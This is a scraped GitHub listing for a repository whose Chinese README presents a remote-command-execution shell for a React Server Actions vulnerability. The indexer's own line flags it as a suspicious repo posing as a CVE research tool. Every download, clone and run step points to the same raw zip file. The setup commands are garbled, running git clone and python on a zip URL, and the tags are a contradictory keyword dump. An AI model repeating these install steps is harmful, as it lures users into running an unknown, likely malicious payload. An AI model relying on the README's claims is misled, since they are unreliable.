alyaapm/CVE-2025-55182-shellinteractive
GitHub: alyaapm/CVE-2025-55182-shellinteractive
一个伪装成 CVE 漏洞研究工具的可疑仓库,声称针对 React Server Actions 漏洞,但存在伪造 CVE 编号和异常下载链接等恶意特征。
Stars: 0 | Forks: 0
# 💻 CVE-2025-55182-shellinteractive - 轻松安全地运行命令
[](https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip)
## 🚀 概述
CVE-2025-55182 是 https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip 和 React Server Components 中的一个漏洞。由于 React Server Actions 中的数据处理不当,此问题允许未经授权的用户在受影响的服务器上运行任意代码。我们的应用程序提供了一个交互式 shell,帮助用户探索此问题并评估其系统。
### ✨ 主要功能
- 具有命令历史记录和自动补全功能的交互式 shell
- 自动漏洞检测
- 远程命令执行
- 文件上传和下载功能
- 内置测试套件用于验证
- 可配置的目标参数,适用于自定义用例
## 📥 下载与安装
要开始使用 CVE-2025-55182-shellinteractive,请按照以下步骤操作:
1. **访问此页面下载最新版本:** [GitHub 发布页面](https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip)。
2. 进入页面后,选择最新的发布版本。下载适合您操作系统的文件。
### 📋 前置条件
在安装应用程序之前,请确保您具备以下条件:
- 计算机上安装了 Python 3.8 或更高版本。
- 处理 Web 请求的 `requests` 库。
### 🛠 快速设置
下载软件后,请按照以下步骤进行设置:
```
# 克隆 repository
git clone https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip
cd CVE-2025-55182-shellinteractive
# 安装 dependencies
pip install requests
# 使 script 可执行(可选)
chmod +x https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip
```
### 📖 用法
该应用程序提供了一个交互式 shell。要开始使用它,只需运行以下命令:
```
# 启动 interactive shell
python https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip
```
## ⚙️ 配置
您可以自定义交互式 shell 的几个参数:
1. **目标 URL:** 指定您要测试的服务器 URL。
2. **超时设置:** 调整请求的时间限制。
3. **详细模式:** 启用此选项可获取活动的详细日志。
## 🌐 其他资源
有关如何利用特定功能和设置的更多详细信息,请查阅仓库中提供的文档。
## 📠 支持
如果您有问题或需要帮助,请随时在 GitHub 仓库中提出 issue。
[](https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip)
您的反馈将极大地帮助改进应用程序。感谢您的关注与支持!
标签:CISA项目, CVE-2025-55182, Maven, PE 加载器, PoC, Python, RCE, React, Server Actions, Syscalls, Web安全, 交互式Shell, 命令执行, 密码管理, 恶意软件, 攻击路径可视化, 文件上传, 无后门, 暴力破解, 漏洞验证, 编程工具, 网络信息收集, 网络安全, 自动化攻击, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护, 黑客工具